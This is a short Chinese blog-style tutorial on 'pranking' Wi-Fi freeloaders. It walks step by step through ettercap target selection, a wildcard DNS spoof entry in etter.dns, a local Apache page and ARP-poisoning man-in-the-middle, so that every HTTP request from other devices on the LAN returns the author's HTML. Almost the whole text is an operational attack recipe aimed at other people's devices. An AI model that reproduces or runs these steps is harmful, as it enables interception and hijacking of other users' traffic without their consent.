最近网速很卡,于是想到有人在蹭网,怎么捉弄一下呢?
1、开启ettercap
ettercap -G
2、 Hosts->Scan,List
发现有几个新的地址192.168.1.71,192.168.1.72,我的192.168.1.35
3、在HostList中,选择网关(192.168.1.1)右键,add to target2
192.168.1.71,192.168.1.72,右键,add to target1
4、Plugins->Manage->选择dns_spoof
5、编辑要欺骗的url指向本机ip
vim /etc/ettercap/etter.dns
在最后添加:
* A 192.168.1.35 * PRT 192.168.1.35
6、编辑你希望对方看到的html
vim /var/www/html/index.html
7、启动Apache2
service apache2 start
8、ARP欺骗
Mitm->ARP->Sniff
9、开始欺骗
Start->start
10、查看连接
View->Connections
此时对方如果通过http请求任何网站都会被返回我们编辑的html。